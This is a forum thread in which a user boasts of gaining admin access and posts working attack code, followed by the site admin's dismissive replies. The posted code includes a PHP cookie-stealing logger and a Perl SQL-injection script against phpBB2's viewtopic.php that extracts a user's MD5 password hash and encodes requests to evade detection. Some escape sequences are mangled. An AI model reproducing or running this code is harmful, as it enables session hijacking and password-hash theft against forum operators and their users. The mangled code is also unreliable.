I have been able to gain admin access! Here is your vulnerability!:
Remote Cookie Stealing:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Stealing of md5 hashes through viewtopic.php:
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
$topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
$topic_id = intval($HTTP_GET_VARS['topic']);
}
now if GET[view]=newest and GET[sid] is set, this query gets executed:
$sql = "SELECT p.post_id
FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
WHERE s.session_id = '$session_id'
AND u.user_id = s.session_user_id
AND p.topic_id = $topic_id
AND p.post_time >= u.user_lastvisit
ORDER BY p.post_time ASC
LIMIT 1";
Now for the actual hack:
$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;
$dbtype = 'mysql4'; # mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dbtypen";
$p = "";
for($index=1; $index<=32; $index++)
{
$socket = IO::Socket::INET->new(PeerAddr => $remote,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@n";
$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
"&view=newest" . " HTTP/1.0nn";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1n"; # replace this for pgsql or remove it
print $socket "Host: $remotenn";
while ($answer = <$socket>)
{
if ($answer =~ /Location:.*x23(d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
{
$p .= chr ($1);
}
}
close($socket);
}
print "nMD5 Hash for uid $uid is $pn";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i<length($str); $i++)
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;
if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dbtype eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dbtype eq 'pgsql')
{
return ";
select ascii(substring(user_password from $index for 1)) as
post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
This is another script that will give a normal user admin rights. I wont post it though. I wouldnt want your precious forums that your loving admin, ReT, has worked so hard to build be destroyed.
-Love Acid_Rain
lol TDH, always seeking to impress no? I see no proof you gained access to admin. π
You didn't fool me for a sec. π
ReT
ruthless deeds return to harass their architect
Oh yeah - cool script. Too bad it's for a version of phpBB released 3 years ago. π
ruthless deeds return to harass their architect
Latest Post: Top 5 (or 10) all-around JK players of "all time?" Our newest member: Maggie.SU Recent Posts Unread Posts
